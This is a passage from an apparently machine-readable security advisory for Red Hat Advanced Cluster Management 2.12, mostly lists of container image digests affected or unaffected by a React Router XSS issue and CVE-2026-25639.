"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:345bd79af661294f223be69961f96494da36e311906fb3a2e64b53677f65fd32_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:3cb2dd7e3a2cd4e2a46cde1f48dd72645c2c51e8bfc0eca8753cc851c726d29c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c834685380ba00674a2835151ec9e4932457abefe6318748aba92cbe8443307d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:12c970f2005e943d674b35c711d2232f146bbbcf8e3807b3fb3c816b42e0cd8a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:dc231932eb7a2a9969fae5fb0e6f95594d71ddf6f957a2cb4751950ab8332510_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:e671767bca7b68bada15e2820d0df6adc49fbffcdb6c9708ee3a5346a919a1e4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:f64b875dcce5d957aaf198e2055a47f7faab441342aab6b2e055efe2d41c78b7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:0799283c1830e1aadd09976286eec671d0a86e44c155238279938b4f329f7157_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:7143a1a00eae582cff7671ab03464db03db48e89bd988ecc4851278922aeea29_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9bac11bcf557740673e7168bb31fb6db8c5d92609094e5f1d1cb4c3ef6bc9603_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:ea03fd92669382846af5c8fa0b58f6858f123060d122f370d6af837f46d9d8aa_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:53a9844ffdd2d3f8cee8737722de91511cefdb4c65a7db614de6c4e070f70431_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:c603c06aa983d6b118e506bd2e6fba19f0cd26e379513c9c710ea517d2bc0d0f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:d9a867a6d289263f568b8940a9b970c8680061c1f26aebb9f8cc479956e9a030_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f9e0a972cd08f77b71dd8b2217c57b98b36c5612ddfd6bb74704c378a03dd7e1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1bda811b132cbc2220815d36983af98e0aafdcb4d30fa78f56bbd85ffc30a37c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:3bc66380cc46ef4bc18498a306535c11f0ba41a629bde92f9f6a35b8a8d11f89_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:c4f9eea72efd49d201456547b2a35abd6a194894e72c209bbe16763b86954639_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:d4b3934ecbd4882845770c313060dc76b588ffa3753f2b2ae0ec5f53ba868935_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:805d44ff7dcd6df5bd73cd58c0f410d8bdeac932d7c440b0c381517c3e1401ae_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:b3cbb2410596e3e0741f518ee3bbf8f6eebce0ea4a7ea4274a1e76f01692fe1e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:c6365357cdc1cd7b0adc4e1813f42d2c67501f770ee58e376e0c02096baca731_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e3d8e0154fdaaa4e292949374fa637ec80827df473f2e3f8cc37425d98dc271b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:943de4b7c383fc679eac276a25ce6557336c95b92ebaa520bb74f8aee24115f5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:d448249f704e54f4316122fb3ad923295ffb5d6d2d16044803b56d1f8439de8f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:ee2ffe06e09f3694be474d69be61552d0e5a4dd7a25df89682aa59e4a10e02f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:f9dfff5ac57b47b580c733413ab3d10dec4d4d50589da894eb0a8278978459f9_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5c90f0eddf6dbee5bdf11a6a818e4fbac22f6c8b2883728416dcc7aaeedd7362_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6528ed4780303fa09312c19f87c0f7d7109d91858473f73e6567e0fdde694b3f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6d1a86ffe09cbc6eba216db55800c21641e308dd1cee215972e0065136b9c612_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:fc6ea36b48ce47052d875988f378cad3ec9cec80189a605acdf1509f2beb52cf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0caaa7f18df2105c9d6199343a70640dd6b558d7de55f2026f99b48d702c5afc_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:28cfe0893f17b70ff67f70cb7e471c8c724bf921b7a36c69ca2c43505bae635e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:7309f5d61a0fe99dfd8d523736afe2c8a709385e0eaaeaacfbda362fc7c2a16b_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:ccf06b51ce92c9f0fe9594b0082d0b09f77bb65b38ce08d5e02ac4f5a6fab2a4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:31153305711975b0bd5f780133699aeca52e96859363e85718c9047b26a32dbf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:55b2f0e54a6fdb3fb83f1af1f16524ebf36f0afb366f40fbbc8768cd4995ffb3_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:6be8bc17e09b099a79437f27ded3d563814e3c6702dd9ed698f5f17b9fb3afa2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:73c4ce25c2cc67fe3bec0cfc51e4c8b34929288f931f0f19c65bbbc969d0c588_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:128b74a18fb1fd1ba63f074d9d31e892a46048068608784f2696a4bbc7b57595_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:6b3fd2f8e3a164670dbbc59fd8c77057f98d97c0ba6ed7975711923e8acabb78_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:7c8de9466fee7334af1fef5647c4abaf9bd6b6012c301bb5c3c6a630cdc1dded_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bbd945e3d0f92c8dfeb5601d7aa4d306f87e6facd9471a3c42f2582a264cd2ba_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:3aa3b11dfb3e0c9daba4818838a3a42e52ab81ecf27fb5fddd779746fd10d6d8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:8c19e6e38d755f35021ed1c57f3e69be65240df37539b72b8fe0d3f8ab050e36_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a8f9a5a9f31cd903f23dfec9c832ed703d06882246aad25bd03e9512b633e5ca_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:e528d7996cda9185d5858a0edd8114b782d5627725d6e350fb087ba9f6270206_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:6a4fe92a913d7b778b8e756c618537c4a44aba7adc980355afcaf88b5cb871e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:b2563c07d52bd29574e0a896a2e72b90ff1144be31ec3dab9f89840be79936df_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:baacec8e68f6fcc0f4ee99f4405f80c560be369ec969a574534b01f43419a15d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:c7a24bf421728915b2e0cf3a7e803cbb18032959feab0cd2867b13f356136178_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:1f747a2fe3ee946ec3df5335c6527da41b84a92c1b7163e24b72809f958934a5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:699833b6f4ee8b8fdb45d5ed4a312972281576700a1a1d28dc0048d6c7188361_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b807be4db3f323ac57c1464843c1b7dc1479b24ac89dadd070813da75f282375_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:d1c112f5dd97d3415030ab12eb93006c04070f70176e89e2555b071d4b1dc881_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:a20f72f80173be40bbd330de88bc94d32e7596bf1b0fd76dd895b739f2df1c2e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d815d7688e0ad3e0d9b20a73f418282ac47eb0c6a2721db959374ff9b5756918_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:dd779a5f1de2fb5b61333ef7d11642a4e8cbfcb745f3f0a4318e336f6fe4e5b6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:f9e8be1fdc48039e3a46a09b9c1279d343a1fb48b987d0d2bdf7c4f0a720ca85_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:2fdcbd70cddfd8ef3d3211529434f24f69ff79fae57143e5ce66452a613b5c56_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:3d863c8706fca20261d46d0591ca2c18d34db98c5341136c840a80d0c285520c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:83eda40795e9b589114cddae252af2fc68ccf76b2a73522ad1094b2f84829be7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e94fb4d6c912c989e11532bd86fe3a2eab5b17329fb3b11362be651609863a50_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:030626d6ba921752acbc68159d7a6776318416c93cfc4360ef8e3c145e9ee635_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:0bdccbe184d904b58291858f01597286b2a0c45584f9af263714089911390f4c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:5fd8d966136617fd453431a649a6572ad640ca515b91c86b9a576c7b1e4fbd0e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:c6b267f6f0bb960032c380a0d978ebe3c8cd948f57a92ba9855c273fbd40a487_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "@remix-run/router: react-router: React Router vulnerable to XSS via Open Redirects"
},
{
"cve": "CVE-2026-25639",
"cwe": {
"id": "CWE-1287",
"name": "Improper Validation of Specified Type of Input"
},
"discovery_date": "2026-02-09T21:00:49.280114+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:20a379058f6e7b95ba010b0ceb936e124a67ad493975557c4bfe085948166b6e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7fb6e4b9729a300d9e82207ede660b52c2566fcdfb1f7174e5dd4cd59514afdf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:8a842f5c48c760be11d7df87fc2519bd9a68886bce7240aabea3e7a99c6bc172_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:fdcd8eff118d00b93f7a197c992bd5ddd1cce96b2b5cf3b542403dcbcc812691_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:59a7ad296b2023d6a633e2f7b99767e2c0c35ead31c8d92bdf233ff52522125d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:5a1fba286678b5d606a3ad553041cd68df207820c5f11685f7df0e94d04c27e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:60546ec2d4128da096811949b2609bdb9c7cb6205b36673ebe9d7b1ff868ea88_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:647b86bfc09d7eca6a7c3f7ee967ea60db1b90329600a0898f8f8b7bbdb204bf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:495889c3607c289f7265ef7bf18187686fedcbf8c382e86e8e98cdc31e8479d5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:519bd85630bb8c1eac29ca79a21a09e949fbe507e4186fe5d990c357517731a7_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:b97cb625d22889517ef86b148ca4bfcc20e39bb887e0715ac37bd915cf45a83b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-addon-controller-rhel9@sha256:d92337026de448a873fe66754e1ea837f7a650b4c8b1a057cbef1cceb6ae114a_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:1ba9482f4a157a04b4b5cc212b7cbb98a323250969501698b230432a6ea545a5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:371bbcd62cb8e6c28cd3c1921e17c9067bc160433c4a6b14a1a2685a5f7d0519_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:922167d560484b217f772384cac0e9da48c31633ebf8984abf3ef99f5c31919b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:fd95f9c98201fc9e2deb2ce1af7598056e7e2bd61e2db42d195fa8acd4958f79_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:280e1dc73ea367d9c818086754ece9ea2d5a2c96496dcfea09844a7a55feb51d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:2d8b0b11cf907b25304501a2a62d5551c792c1fb3662ea4cd0e01db724a57b86_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:9abfdfd7491e219d7249800e05298472c4d545687fa7b6c79da71f9414f29d12_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:c11c8ba588a27d39f1b46bc6b63eebd8e9f9a822917a7638216c7fb93350aaf3_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:16710678f62e24a8877350bfdada7b8a533d4abad81984145e31614dc0e64d26_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:88c844cba042e1cd006c3ad413808ad10c4bdb95e8c0fc7b79cec3c3c40882b1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:d32bc1e886821ba104e8b2a5e16dc7b0aa1a01ea927e426ebd264298ac1d66f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f09e16c30c4641612b2306cdbf56f85e31e03028d522597adf2e00f781148254_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:0dbdb9d02b41e437dd885741918114d8eea5bcdb1e97098b8e026adaf0cc70de_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:5a2014800be744b5034e754ad88cc82c29779c629cf2aa52068274aecd7b9d88_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:dc38a15065a73653097c85f6eb1b287a97498bc69dd86e7dbcd9efe6853255bb_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:f544c239f288daac99ca0018719000678f2e9f27b8303a5182fa01777c4c12f0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:0184923381940f806687d21a3422e16bee10b39b409fcecb50c940ed9b7e4d58_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:54390653fd89def95d9cba388cd37466ce709d843a9950b545091d9d9e14b4e4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:874f930ace72bd2771944e734432c322735b3bd91804019b211953070a308dd9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:d865a100823ff771c33e5e5799f16e1207158ab7519c6ac8a4daf53e1c4ae092_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:57fb017c2ba0f20880fc278689d37919ab95a88dffa0626d9a48050bef3b6fe3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:7d87a9cda623d527c5eaa08c5637422ed136339a9688edd5e8e9cc46f254beb3_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:b123eb6e855ec01a82e6ec2afa052eb344e2851b3d134514c53162012852d568_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:f12861597e8d62263d2ffa52b1fd19614a063605968999aeef33f444cfa82539_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:28ca07a0f4c2f02d47bfecae31110cbdc3284f1a7d688b559ed7d6305930ce81_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:713fafc87903d4284173e4b9690d0e3deba23d51ca0974106f0a76a450c38501_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:9a6847c058acd9d84d402506ac00576e0c437edb261c8e564605abab1b97428c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:c033acafe192f185dde20f032d399de7f4f9d25804ba96afe50e08eb1608a956_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:40cfab127e82cc6afc68b0642832e84ec45838db71d5500a42d87921ade70171_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:6dbefefd5b830cd9431559d7123d9643dca69e0cbbb58f5c5cc90f3d5e526c09_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:8262fa7a50560e0ac051f9ec158daceeb384acc92b1f98c0b7b73f5ec0451908_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:b2ee688170d432298a3eb7d0b057a01bcba26dfddfeabca7941f4bc3fc865141_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0478cb24ab3df5826881b91dd0ea1b8152defdd04e38d0bc500a860a828716b0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:247872fe30c6d0bbb1098b6f189fd23aca2357122e591eb2bed3c79b0fe27055_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b6a958526ae7d64016a110bd81ee38218bce014d52f10a6517a471bddfb93d45_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:ee89796a7ee9e6ab9cde9a5a450e16221bbdb74444188939c983d6d185bee08a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:243d75725446e0fe6be10ba04796c4db395f911470d1fd2575d35a3f1c82930c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:89f973ff38fcf35a484da1531bcf00db5e1d387a64a6dcbb25f19a5c26494584_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:a33b245208c9999546524f3bf971bb220418045dd799cebc43f0413823db0f8b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ea918d66e2be8cc1411e048f3638afae348a44df36143621bcd3132718b33664_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:22b747e9952ede6b831297b64684acaafaf3e12998d6872081a08ae39b52c87b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:5d368764b9745d9a977bde3c4cd2faac1a344aea716ce626a0904b7da80f5267_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:8deed2b9ade0bc7ab30fd93d165fc1a8e18caab7b4af1d1b2b326dc93570c498_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:b68a3a1fe74bc4b319859874ca19a4e35c72174afc6a2af08e4bd7b64898d27f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5f814b2ab34c4dcaedb7394d9f1ef9bd4d1bf6af934cd716ac44d1cfc43a6edf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:9acfa5180f02a68485cd1fc43e4794c7ffbac02c16942fabfbad9dd586c8ff74_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c409f96ae15f3022713e434c4c8f146d943dbf48e852e0b8f90b4964ec0736a7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f72ecb77638a3d19ef4480040995278031deb4551f139e376994bc0ac3462ef5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:243ea42175c4fa3d189e2f2bf061c9645d5d3b2870378149c52740f563c91ce8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3b23775b863a11e1edd62b24c01085b74019b7f414d0784c99d41b1e0e8a6e9b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3e29508feb3f13f4771e6321f9b2f281d557e3239e52e29301ef30a305ffcde9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:427b347a2e17b66849dc51f9a62563ae8c013d5794c61821141dec737d059304_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:0b87acce1304734d30b2bfbd5d277e72efce2433680111e02fc5cff8127376dd_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:438093777b18dc840316a9a82331d832fdc9f3d83aaae20d97f56ed67b58a359_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:93d29e5678d618cfa84ce60f2d62ba96929ea47ec1515f63a9d61d548968e902_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b182a45fbe8caf69df6145ed79f2ab0e82c955ff5f5caa7fab8d0faffdb50664_amd64",
